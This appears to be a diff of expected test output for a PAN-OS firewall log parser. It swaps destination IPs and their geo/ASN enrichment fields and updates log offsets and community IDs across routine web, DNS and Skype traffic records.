- "server.ip": "204.232.231.46",
+ "server.ip": "67.43.156.12",
 "server.packets": 4,
 "server.port": 80,
 "service.type": "panw",
@@ -2433,19 +2316,15 @@
 "client.packets": 6,
 "client.port": 59203,
 "client.user.name": "crusher",
- "destination.address": "204.232.231.46",
- "destination.as.number": 27357,
- "destination.as.organization.name": "Rackspace Hosting",
+ "destination.address": "67.43.156.12",
+ "destination.as.number": 35908,
 "destination.bytes": 806,
- "destination.geo.city_name": "Fort Lauderdale",
- "destination.geo.continent_name": "North America",
- "destination.geo.country_iso_code": "US",
- "destination.geo.country_name": "United States",
- "destination.geo.location.lat": 26.1792,
- "destination.geo.location.lon": -80.1749,
- "destination.geo.region_iso_code": "US-FL",
- "destination.geo.region_name": "Florida",
- "destination.ip": "204.232.231.46",
+ "destination.geo.continent_name": "Asia",
+ "destination.geo.country_iso_code": "BT",
+ "destination.geo.country_name": "Bhutan",
+ "destination.geo.location.lat": 27.5,
+ "destination.geo.location.lon": 90.5,
+ "destination.ip": "67.43.156.12",
 "destination.packets": 4,
 "destination.port": 80,
 "event.action": "flow_terminated",
@@ -2458,7 +2337,7 @@
 "event.end": "2012-04-10T04:39:26.000-02:00",
 "event.kind": "event",
 "event.module": "panw",
- "event.original": "Oct 30 09:46:17 1,2012/10/30 09:46:17,01606001116,TRAFFIC,end,1,2012/04/10 04:39:56,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:56,26138,1,59203,80,0,0,0x200000,tcp,allow,1355,549,806,10,2012/04/10 04:39:26,0,private-ip-addresses,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,6,4",
+ "event.original": "Oct 30 09:46:17 1,2012/10/30 09:46:17,01606001116,TRAFFIC,end,1,2012/04/10 04:39:56,192.168.0.2,67.43.156.12,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:56,26138,1,59203,80,0,0,0x200000,tcp,allow,1355,549,806,10,2012/04/10 04:39:26,0,private-ip-addresses,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,6,4",
 "event.outcome": "success",
 "event.start": "2012-04-10T04:39:26.000-02:00",
 "event.timezone": "-02:00",
@@ -2470,10 +2349,10 @@
 "fileset.name": "panos",
 "input.type": "log",
 "labels.captive_portal": true,
- "log.offset": 8803,
+ "log.offset": 8769,
 "network.application": "web-browsing",
 "network.bytes": 1355,
- "network.community_id": "1:+ENVPObTW4uBLTLg/Gs7oB3/t0E=",
+ "network.community_id": "1:1KQZF73ZpXY01SATsJ3TT+frjzA=",
 "network.direction": "outbound",
 "network.packets": 10,
 "network.transport": "tcp",
@@ -2505,14 +2384,14 @@
 "related.ip": [
 "0.0.0.0",
 "192.168.0.2",
- "204.232.231.46"
+ "67.43.156.12"
 ],
 "related.user": [
 "crusher"
 ],
 "rule.name": "rule1",
 "server.bytes": 806,
- "server.ip": "204.232.231.46",
+ "server.ip": "67.43.156.12",
 "server.packets": 4,
 "server.port": 80,
 "service.type": "panw",
@@ -2535,19 +2414,15 @@
 "client.packets": 1,
 "client.port": 59305,
 "client.user.name": "crusher",
- "destination.address": "204.232.231.46",
- "destination.as.number": 27357,
- "destination.as.organization.name": "Rackspace Hosting",
+ "destination.address": "67.43.156.12",
+ "destination.as.number": 35908,
 "destination.bytes": 0,
- "destination.geo.city_name": "Fort Lauderdale",
- "destination.geo.continent_name": "North America",
- "destination.geo.country_iso_code": "US",
- "destination.geo.country_name": "United States",
- "destination.geo.location.lat": 26.1792,
- "destination.geo.location.lon": -80.1749,
- "destination.geo.region_iso_code": "US-FL",
- "destination.geo.region_name": "Florida",
- "destination.ip": "204.232.231.46",
+ "destination.geo.continent_name": "Asia",
+ "destination.geo.country_iso_code": "BT",
+ "destination.geo.country_name": "Bhutan",
+ "destination.geo.location.lat": 27.5,
+ "destination.geo.location.lon": 90.5,
+ "destination.ip": "67.43.156.12",
 "destination.packets": 0,
 "destination.port": 80,
 "event.action": "flow_started",
@@ -2560,7 +2435,7 @@
 "event.end": "2012-04-10T04:39:56.000-02:00",
 "event.kind": "event",
 "event.module": "panw",
- "event.original": "Oct 30 09:46:17 1,2012/10/30 09:46:17,01606001116,TRAFFIC,start,1,2012/04/10 04:39:55,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:56,27175,1,59305,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:56,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0",
+ "event.original": "Oct 30 09:46:17 1,2012/10/30 09:46:17,01606001116,TRAFFIC,start,1,2012/04/10 04:39:55,192.168.0.2,67.43.156.12,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:56,27175,1,59305,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:56,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0",
 "event.outcome": "success",
 "event.start": "2012-04-10T04:39:56.000-02:00",
 "event.timezone": "-02:00",
@@ -2572,10 +2447,10 @@
 "fileset.name": "panos",
 "input.type": "log",
 "labels.captive_portal": true,
- "log.offset": 9188,
+ "log.offset": 9152,
 "network.application": "web-browsing",
 "network.bytes": 78,
- "network.community_id": "1:TPp8b1ubMhxmeJWRt0DCagjd7jA=",
+ "network.community_id": "1:4EImQ9QUHZ6aQjNmpPlX5dryAZg=",
 "network.direction": "outbound",
 "network.packets": 1,
 "network.transport": "tcp",
@@ -2607,14 +2482,14 @@
 "related.ip": [
 "0.0.0.0",
 "192.168.0.2",
- "204.232.231.46"
+ "67.43.156.12"
 ],
 "related.user": [
 "crusher"
 ],
 "rule.name": "rule1",
 "server.bytes": 0,
- "server.ip": "204.232.231.46",
+ "server.ip": "67.43.156.12",
 "server.packets": 0,
 "server.port": 80,
 "service.type": "panw",
@@ -2638,14 +2513,7 @@
 "client.port": 64005,
 "client.user.name": "crusher",
 "destination.address": "205.171.2.25",
- "destination.as.number": 209,
- "destination.as.organization.name": "CenturyLink Communications, LLC",
 "destination.bytes": 0,
- "destination.geo.continent_name": "North America",
- "destination.geo.country_iso_code": "US",
- "destination.geo.country_name": "United States",
- "destination.geo.location.lat": 37.751,
- "destination.geo.location.lon": -97.822,
 "destination.ip": "205.171.2.25",
 "destination.packets": 0,
 "destination.port": 53,
@@ -2671,7 +2539,7 @@
 "fileset.name": "panos",
 "input.type": "log",
 "labels.captive_portal": true,
- "log.offset": 9552,
+ "log.offset": 9514,
 "network.application": "dns",
 "network.bytes": 69,
 "network.community_id": "1:9xSXx0HsnsbhZkZ6kFjNeIn1Aw8=",
@@ -2737,14 +2605,7 @@
 "client.port": 58768,
 "client.user.name": "crusher",
 "destination.address": "205.171.2.25",
- "destination.as.number": 209,
- "destination.as.organization.name": "CenturyLink Communications, LLC",
 "destination.bytes": 0,
- "destination.geo.continent_name": "North America",
- "destination.geo.country_iso_code": "US",
- "destination.geo.country_name": "United States",
- "destination.geo.location.lat": 37.751,
- "destination.geo.location.lon": -97.822,
 "destination.ip": "205.171.2.25",
 "destination.packets": 0,
 "destination.port": 53,
@@ -2770,7 +2631,7 @@
 "fileset.name": "panos",
 "input.type": "log",
 "labels.captive_portal": true,
- "log.offset": 9905,
+ "log.offset": 9867,
 "network.application": "dns",
 "network.bytes": 69,
 "network.community_id": "1:Ukie7FwgRVUkTl4/hKbkxseBqj0=",
@@ -2836,17 +2697,7 @@
 "client.port": 47752,
 "client.user.name": "crusher",
 "destination.address": "98.149.55.63",
- "destination.as.number": 20001,
- "destination.as.organization.name": "Charter Communications Inc",
 "destination.bytes": 504,
- "destination.geo.city_name": "Westminster",
- "destination.geo.continent_name": "North America",
- "destination.geo.country_iso_code": "US",
- "destination.geo.country_name": "United States",
- "destination.geo.location.lat": 33.7518,
- "destination.geo.location.lon": -117.9932,
- "destination.geo.region_iso_code": "US-CA",
- "destination.geo.region_name": "California",
 "destination.ip": "98.149.55.63",
 "destination.packets": 8,
 "destination.port": 13069,
@@ -2872,7 +2723,7 @@
 "fileset.name": "panos",
 "input.type": "log",
 "labels.captive_portal": true,
- "log.offset": 10258,
+ "log.offset": 10220,
 "network.application": "skype",
 "network.bytes": 1008,
 "network.community_id": "1:7+CQvC/DGk2fhUdWzglWwYXYMZE=",
@@ -2937,19 +2788,15 @@
 "client.packets": 1,
 "client.port": 59304,
 "client.user.name": "crusher",
- "destination.address": "204.232.231.46",
- "destination.as.number": 27357,
- "destination.as.organization.name": "Rackspace Hosting",
+ "destination.address": "67.43.156.12",
+ "destination.as.number": 35908,
 "destination.bytes": 0,
- "destination.geo.city_name": "Fort Lauderdale",
- "destination.geo.continent_name": "North America",
- "destination.geo.country_iso_code": "US",
- "destination.geo.country_name": "United States",
- "destination.geo.location.lat": 26.1792,
- "destination.geo.location.lon": -80.1749,
- "destination.geo.region_iso_code": "US-FL",
- "destination.geo.region_name": "Florida",
- "destination.ip": "204.232.231.46",
+ "destination.geo.continent_name": "Asia",
+ "destination.geo.country_iso_code": "BT",
+ "destination.geo.country_name": "Bhutan",
+ "destination.geo.location.lat": 27.5,
+ "destination.geo.location.lon": 90.5,
+ "destination.ip": "67.43.156.12",
 "destination.packets": 0,
 "destination.port": 80,
 "event.action": "flow_started",
@@ -2962,7 +2809,7 @@
 "event.end": "2012-04-10T04:39:55.000-02:00",
 "event.kind": "event",
 "event.module": "panw",
- "event.original": "Oct 30 09:46:17 1,2012/10/30 09:46:17,01606001116,TRAFFIC,start,1,2012/04/10 04:39:55,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:56,26360,1,59304,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:55,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0",
+ "event.original": "Oct 30 09:46:17 1,2012/10/30 09:46:17,01606001116,TRAFFIC,start,1,2012/04/10 04:39:55,192.168.0.2,67.43.156.12,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:56,26360,1,59304,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:55,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0",
 "event.outcome": "success",
 "event.start": "2012-04-10T04:39:55.000-02:00",
 "event.timezone": "-02:00",
@@ -2974,10 +2821,10 @@
 "fileset.name": "panos",
 "input.type": "log",
 "labels.captive_portal": true,
- "log.offset": 10624,
+ "log.offset": 10586,
 "network.application": "web-browsing",
 "network.bytes": 78,
- "network.community_id": "1:h+XKHvMK2Oz7QQvaJdhsJWE2c9E=",
+ "network.community_id": "1:JJMt5TnGAbJ3hOj5OyWJMZSrCkI=",
 "network.direction": "outbound",
 "network.packets": 1,
 "network.transport": "tcp",
@@ -3009,14 +2856,14 @@
 "related.ip": [
 "0.0.0.0",
 "192.168.0.2",
- "204.232.231.46"
+ "67.43.156.12"
 ],
 "related.user": [
 "crusher"
 ],
 "rule.name": "rule1",
 "server.bytes": 0,
- "server.ip": "204.232.231.46",
+ "server.ip": "67.43.156.12",
 "server.packets": 0,
 "server.port": 80,
 "service.type": "panw",
@@ -3040,14 +2887,7 @@ "client.port": 54533, "client.user.name": "crusher", "destination.address": "205.171.2.25", - "destination.as.number": 209, - "destination.as.organization.name": "CenturyLink Communications, LLC", "destination.bytes": 0, - "destination.geo.continent_name": "North America", - "destination.geo.country_iso_code": "US", - "destination.geo.country_name": "United States", - "destination.geo.location.lat": 37.751, - "destination.geo.location.lon": -97.822, "destination.ip": "205.171.2.25", "destination.packets": 0, "destination.port": 53, @@ -3073,7 +2913,7 @@ "fileset.name": "panos", "input.type": "log", "labels.captive_portal": true, - "log.offset": 10988, + "log.offset": 10948, "network.application": "dns", "network.bytes": 71, "network.community_id": "1:x/kpg5sNW5nn7RkabTWPIKsvO58=", @@ -3139,17 +2979,7 @@ "client.port": 59201, "client.user.name": "crusher", "destination.address": "212.48.10.58", - "destination.as.number": 8660, - "destination.as.organization.name": "Italiaonline S.p.A.", "destination.bytes": 9130, - "destination.geo.city_name": "Assago", - "destination.geo.continent_name": "Europe", - "destination.geo.country_iso_code": "IT", - "destination.geo.country_name": "Italy", - "destination.geo.location.lat": 45.4087, - "destination.geo.location.lon": 9.1225, - "destination.geo.region_iso_code": "IT-MI", - "destination.geo.region_name": "Milan", "destination.ip": "212.48.10.58", "destination.packets": 10, "destination.port": 80, @@ -3175,7 +3005,7 @@ "fileset.name": "panos", "input.type": "log", "labels.captive_portal": true, - "log.offset": 11341, + "log.offset": 11301, "network.application": "web-browsing", "network.bytes": 9967, "network.community_id": "1:GL6UBrkzpi/gQHrUyqxHb1jJeUU=", 
@@ -3240,19 +3070,15 @@ "client.packets": 1, "client.port": 59303, "client.user.name": "crusher", - "destination.address": "204.232.231.46", - "destination.as.number": 27357, - "destination.as.organization.name": "Rackspace Hosting", + "destination.address": "67.43.156.12", + "destination.as.number": 35908, "destination.bytes": 0, - "destination.geo.city_name": "Fort Lauderdale", - "destination.geo.continent_name": "North America", - "destination.geo.country_iso_code": "US", - "destination.geo.country_name": "United States", - "destination.geo.location.lat": 26.1792, - "destination.geo.location.lon": -80.1749, - "destination.geo.region_iso_code": "US-FL", - "destination.geo.region_name": "Florida", - "destination.ip": "204.232.231.46", + "destination.geo.continent_name": "Asia", + "destination.geo.country_iso_code": "BT", + "destination.geo.country_name": "Bhutan", + "destination.geo.location.lat": 27.5, + "destination.geo.location.lon": 90.5, + "destination.ip": "67.43.156.12", "destination.packets": 0, "destination.port": 80, "event.action": "flow_started", 
@@ -3265,7 +3091,7 @@ "event.end": "2012-04-10T04:39:55.000-02:00", "event.kind": "event", "event.module": "panw", - "event.original": "Oct 30 09:46:22 1,2012/10/30 09:46:22,01606001116,TRAFFIC,start,1,2012/04/10 04:39:54,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:55,22860,1,59303,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:55,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", + "event.original": "Oct 30 09:46:22 1,2012/10/30 09:46:22,01606001116,TRAFFIC,start,1,2012/04/10 04:39:54,192.168.0.2,67.43.156.12,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:55,22860,1,59303,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:55,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", "event.outcome": "success", "event.start": "2012-04-10T04:39:55.000-02:00", "event.timezone": "-02:00", @@ -3277,10 +3103,10 @@ "fileset.name": "panos", "input.type": "log", "labels.captive_portal": true, - "log.offset": 11713, + "log.offset": 11673, "network.application": "web-browsing", "network.bytes": 78, - "network.community_id": "1:6kV576B7jMsBLC62npA6Dgi/zMI=", + "network.community_id": "1:zikh1dISky6Bvrt3EQgtSiB7tFM=", "network.direction": "outbound", "network.packets": 1, "network.transport": "tcp", @@ -3312,14 +3138,14 @@ "related.ip": [ "0.0.0.0", "192.168.0.2", - "204.232.231.46" + "67.43.156.12" ], "related.user": [ "crusher" ], "rule.name": "rule1", "server.bytes": 0, - "server.ip": "204.232.231.46", + "server.ip": "67.43.156.12", "server.packets": 0, "server.port": 80, "service.type": "panw", 
@@ -3343,14 +3169,7 @@ "client.port": 50876, "client.user.name": "crusher", "destination.address": "205.171.2.25", - "destination.as.number": 209, - "destination.as.organization.name": "CenturyLink Communications, LLC", "destination.bytes": 0, - "destination.geo.continent_name": "North America", - "destination.geo.country_iso_code": "US", - "destination.geo.country_name": "United States", - "destination.geo.location.lat": 37.751, - "destination.geo.location.lon": -97.822, "destination.ip": "205.171.2.25", "destination.packets": 0, "destination.port": 53, @@ -3376,7 +3195,7 @@ "fileset.name": "panos", "input.type": "log", "labels.captive_portal": true, - "log.offset": 12077, + "log.offset": 12035, "network.application": "dns", "network.bytes": 76, "network.community_id": "1:TuGe54F1FJdU+mNdTf97Ced2UmI=", @@ -3442,14 +3261,7 @@ "client.port": 57657, "client.user.name": "crusher", "destination.address": "205.171.2.25", - "destination.as.number": 209, - "destination.as.organization.name": "CenturyLink Communications, LLC", "destination.bytes": 0, - "destination.geo.continent_name": "North America", - "destination.geo.country_iso_code": "US", - "destination.geo.country_name": "United States", - "destination.geo.location.lat": 37.751, - "destination.geo.location.lon": -97.822, "destination.ip": "205.171.2.25", "destination.packets": 0, "destination.port": 53, @@ -3475,7 +3287,7 @@ "fileset.name": "panos", "input.type": "log", "labels.captive_portal": true, - "log.offset": 12430, + "log.offset": 12388, "network.application": "dns", "network.bytes": 76, "network.community_id": "1:1yn57zVSr0UsUwbuL7XvzIWMbpM=", 
@@ -3540,19 +3352,15 @@ "client.packets": 1, "client.port": 59302, "client.user.name": "crusher", - "destination.address": "204.232.231.46", - "destination.as.number": 27357, - "destination.as.organization.name": "Rackspace Hosting", + "destination.address": "67.43.156.12", + "destination.as.number": 35908, "destination.bytes": 0, - "destination.geo.city_name": "Fort Lauderdale", - "destination.geo.continent_name": "North America", - "destination.geo.country_iso_code": "US", - "destination.geo.country_name": "United States", - "destination.geo.location.lat": 26.1792, - "destination.geo.location.lon": -80.1749, - "destination.geo.region_iso_code": "US-FL", - "destination.geo.region_name": "Florida", - "destination.ip": "204.232.231.46", + "destination.geo.continent_name": "Asia", + "destination.geo.country_iso_code": "BT", + "destination.geo.country_name": "Bhutan", + "destination.geo.location.lat": 27.5, + "destination.geo.location.lon": 90.5, + "destination.ip": "67.43.156.12", "destination.packets": 0, "destination.port": 80, "event.action": "flow_started", 
@@ -3565,7 +3373,7 @@ "event.end": "2012-04-10T04:39:54.000-02:00", "event.kind": "event", "event.module": "panw", - "event.original": "Oct 30 09:46:22 1,2012/10/30 09:46:22,01606001116,TRAFFIC,start,1,2012/04/10 04:39:54,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:55,24910,1,59302,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:54,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", + "event.original": "Oct 30 09:46:22 1,2012/10/30 09:46:22,01606001116,TRAFFIC,start,1,2012/04/10 04:39:54,192.168.0.2,67.43.156.12,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:55,24910,1,59302,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:54,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", "event.outcome": "success", "event.start": "2012-04-10T04:39:54.000-02:00", "event.timezone": "-02:00", @@ -3577,10 +3385,10 @@ "fileset.name": "panos", "input.type": "log", "labels.captive_portal": true, - "log.offset": 12783, + "log.offset": 12741, "network.application": "web-browsing", "network.bytes": 78, - "network.community_id": "1:22ouAyA1O0KgUQOEKP20E7gNa2U=", + "network.community_id": "1:vAUMECfwOw0ZMjDh547rBQbLCC0=", "network.direction": "outbound", "network.packets": 1, "network.transport": "tcp", @@ -3612,14 +3420,14 @@ "related.ip": [ "0.0.0.0", "192.168.0.2", - "204.232.231.46" + "67.43.156.12" ], "related.user": [ "crusher" ], "rule.name": "rule1", "server.bytes": 0, - "server.ip": "204.232.231.46", + "server.ip": "67.43.156.12", "server.packets": 0, "server.port": 80, "service.type": "panw", 
@@ -3642,19 +3450,15 @@ "client.packets": 1, "client.port": 59301, "client.user.name": "crusher", - "destination.address": "204.232.231.46", - "destination.as.number": 27357, - "destination.as.organization.name": "Rackspace Hosting", + "destination.address": "67.43.156.12", + "destination.as.number": 35908, "destination.bytes": 0, - "destination.geo.city_name": "Fort Lauderdale", - "destination.geo.continent_name": "North America", - "destination.geo.country_iso_code": "US", - "destination.geo.country_name": "United States", - "destination.geo.location.lat": 26.1792, - "destination.geo.location.lon": -80.1749, - "destination.geo.region_iso_code": "US-FL", - "destination.geo.region_name": "Florida", - "destination.ip": "204.232.231.46", + "destination.geo.continent_name": "Asia", + "destination.geo.country_iso_code": "BT", + "destination.geo.country_name": "Bhutan", + "destination.geo.location.lat": 27.5, + "destination.geo.location.lon": 90.5, + "destination.ip": "67.43.156.12", "destination.packets": 0, "destination.port": 80, "event.action": "flow_started", 
@@ -3667,7 +3471,7 @@ "event.end": "2012-04-10T04:39:54.000-02:00", "event.kind": "event", "event.module": "panw", - "event.original": "Oct 30 09:46:22 1,2012/10/30 09:46:22,01606001116,TRAFFIC,start,1,2012/04/10 04:39:54,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:55,26862,1,59301,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:54,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", + "event.original": "Oct 30 09:46:22 1,2012/10/30 09:46:22,01606001116,TRAFFIC,start,1,2012/04/10 04:39:54,192.168.0.2,67.43.156.12,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:55,26862,1,59301,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:54,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", "event.outcome": "success", "event.start": "2012-04-10T04:39:54.000-02:00", "event.timezone": "-02:00", @@ -3679,10 +3483,10 @@ "fileset.name": "panos", "input.type": "log", "labels.captive_portal": true, - "log.offset": 13147, + "log.offset": 13103, "network.application": "web-browsing", "network.bytes": 78, - "network.community_id": "1:phQpgsVhj3YxNYzeNkqdzDgcMCg=", + "network.community_id": "1:NUjNq/OVSu47ikA9lKKSraDM5HU=", "network.direction": "outbound", "network.packets": 1, "network.transport": "tcp", @@ -3714,14 +3518,14 @@ "related.ip": [ "0.0.0.0", "192.168.0.2", - "204.232.231.46" + "67.43.156.12" ], "related.user": [ "crusher" ], "rule.name": "rule1", "server.bytes": 0, - "server.ip": "204.232.231.46", + "server.ip": "67.43.156.12", "server.packets": 0, "server.port": 80, "service.type": "panw", 
@@ -3745,14 +3549,7 @@ "client.port": 64844, "client.user.name": "crusher", "destination.address": "205.171.2.25", - "destination.as.number": 209, - "destination.as.organization.name": "CenturyLink Communications, LLC", "destination.bytes": 0, - "destination.geo.continent_name": "North America", - "destination.geo.country_iso_code": "US", - "destination.geo.country_name": "United States", - "destination.geo.location.lat": 37.751, - "destination.geo.location.lon": -97.822, "destination.ip": "205.171.2.25", "destination.packets": 0, "destination.port": 53, @@ -3778,7 +3575,7 @@ "fileset.name": "panos", "input.type": "log", "labels.captive_portal": true, - "log.offset": 13511, + "log.offset": 13465, "network.application": "dns", "network.bytes": 80, "network.community_id": "1:SxifLhXvL8EiCuMvSbDcRARZyRw=", @@ -3844,14 +3641,7 @@ "client.port": 52257, "client.user.name": "crusher", "destination.address": "205.171.2.25", - "destination.as.number": 209, - "destination.as.organization.name": "CenturyLink Communications, LLC", "destination.bytes": 0, - "destination.geo.continent_name": "North America", - "destination.geo.country_iso_code": "US", - "destination.geo.country_name": "United States", - "destination.geo.location.lat": 37.751, - "destination.geo.location.lon": -97.822, "destination.ip": "205.171.2.25", "destination.packets": 0, "destination.port": 53, @@ -3877,7 +3667,7 @@ "fileset.name": "panos", "input.type": "log", "labels.captive_portal": true, - "log.offset": 13864, + "log.offset": 13818, "network.application": "dns", "network.bytes": 80, "network.community_id": "1:QYDqyZAUrBKpnIVn+epBn1ew/so=", 
@@ -3941,16 +3731,17 @@ "client.ip": "192.168.0.100", "client.packets": 1, "client.port": 38796, - "destination.address": "8.8.8.8", - "destination.as.number": 15169, - "destination.as.organization.name": "Google LLC", + "destination.address": "175.16.199.1", "destination.bytes": 111, - "destination.geo.continent_name": "North America", - "destination.geo.country_iso_code": "US", - "destination.geo.country_name": "United States", - "destination.geo.location.lat": 37.751, - "destination.geo.location.lon": -97.822, - "destination.ip": "8.8.8.8", + "destination.geo.city_name": "Changchun", + "destination.geo.continent_name": "Asia", + "destination.geo.country_iso_code": "CN", + "destination.geo.country_name": "China", + "destination.geo.location.lat": 43.88, + "destination.geo.location.lon": 125.3228, + "destination.geo.region_iso_code": "CN-22", + "destination.geo.region_name": "Jilin Sheng", + "destination.ip": "175.16.199.1", "destination.packets": 1, "destination.port": 53, "event.action": "flow_terminated", @@ -3963,7 +3754,7 @@ "event.end": "2012-04-10T04:39:24.000-02:00", "event.kind": "event", "event.module": "panw", - "event.original": "Oct 30 09:46:22 1,2012/10/30 09:46:22,01606001116,TRAFFIC,end,1,2012/04/10 04:39:54,192.168.0.100,8.8.8.8,0.0.0.0,0.0.0.0,rule1,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:54,25142,1,38796,53,0,0,0x0,udp,allow,206,95,111,2,2012/04/10 04:39:24,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,1", + "event.original": "Oct 30 09:46:22 1,2012/10/30 09:46:22,01606001116,TRAFFIC,end,1,2012/04/10 04:39:54,192.168.0.100,175.16.199.1,0.0.0.0,0.0.0.0,rule1,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:54,25142,1,38796,53,0,0,0x0,udp,allow,206,95,111,2,2012/04/10 04:39:24,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,1", "event.outcome": "success", "event.start": "2012-04-10T04:39:24.000-02:00", "event.timezone": "-02:00", 
@@ -3974,10 +3765,10 @@ ], "fileset.name": "panos", "input.type": "log", - "log.offset": 14217, + "log.offset": 14171, "network.application": "dns", "network.bytes": 206, - "network.community_id": "1:shHCpyazCigToSNjn/e4N7P4biU=", + "network.community_id": "1:pMMIMicfrENbfeypsdzAPcSdfIs=", "network.direction": "outbound", "network.packets": 2, "network.transport": "udp", @@ -4008,12 +3799,12 @@ "panw.panos.virtual_sys": "vsys1", "related.ip": [ "0.0.0.0", - "192.168.0.100", - "8.8.8.8" + "175.16.199.1", + "192.168.0.100" ], "rule.name": "rule1", "server.bytes": 111, - "server.ip": "8.8.8.8", + "server.ip": "175.16.199.1", "server.packets": 1, "server.port": 53, "service.type": "panw", @@ -4035,14 +3826,7 @@ "client.port": 59200, "client.user.name": "crusher", "destination.address": "62.211.68.12", - "destination.as.number": 3269, - "destination.as.organization.name": "Telecom Italia", "destination.bytes": 906, - "destination.geo.continent_name": "Europe", - "destination.geo.country_iso_code": "IT", - "destination.geo.country_name": "Italy", - "destination.geo.location.lat": 43.1479, - "destination.geo.location.lon": 12.1097, "destination.ip": "62.211.68.12", "destination.packets": 7, "destination.port": 80, @@ -4068,7 +3852,7 @@ "fileset.name": "panos", "input.type": "log", "labels.captive_portal": true, - "log.offset": 14556, + "log.offset": 14515, "network.application": "web-browsing", "network.bytes": 1503, "network.community_id": "1:cDqhuLJdpDu0NsYQNFC3GAMS3GQ=", 
@@ -4133,17 +3917,7 @@ "client.packets": 10, "client.port": 48412, "destination.address": "50.19.102.116", - "destination.as.number": 14618, - "destination.as.organization.name": "Amazon.com, Inc.", "destination.bytes": 5013, - "destination.geo.city_name": "Ashburn", - "destination.geo.continent_name": "North America", - "destination.geo.country_iso_code": "US", - "destination.geo.country_name": "United States", - "destination.geo.location.lat": 39.0481, - "destination.geo.location.lon": -77.4728, - "destination.geo.region_iso_code": "US-VA", - "destination.geo.region_name": "Virginia", "destination.ip": "50.19.102.116", "destination.packets": 7, "destination.port": 443, @@ -4168,7 +3942,7 @@ ], "fileset.name": "panos", "input.type": "log", - "log.offset": 14933, + "log.offset": 14892, "network.application": "paloalto-wildfire-cloud", "network.bytes": 5817, "network.community_id": "1:uf1iUYRFFiUYttG2AFf4pcXOdjw=", @@ -4229,17 +4003,7 @@ "client.port": 47752, "client.user.name": "crusher", "destination.address": "65.55.223.19", - "destination.as.number": 8075, - "destination.as.organization.name": "Microsoft Corporation", "destination.bytes": 99, - "destination.geo.city_name": "Washington", - "destination.geo.continent_name": "North America", - "destination.geo.country_iso_code": "US", - "destination.geo.country_name": "United States", - "destination.geo.location.lat": 38.7095, - "destination.geo.location.lon": -78.1539, - "destination.geo.region_iso_code": "US-VA", - "destination.geo.region_name": "Virginia", "destination.ip": "65.55.223.19", "destination.packets": 1, "destination.port": 40026, @@ -4265,7 +4029,7 @@ "fileset.name": "panos", "input.type": "log", "labels.captive_portal": true, - "log.offset": 15331, + "log.offset": 15290, "network.application": "skype-probe", "network.bytes": 286, "network.community_id": "1:XF4dVSWPB46mtqr78f9EFUDEn6I=", 
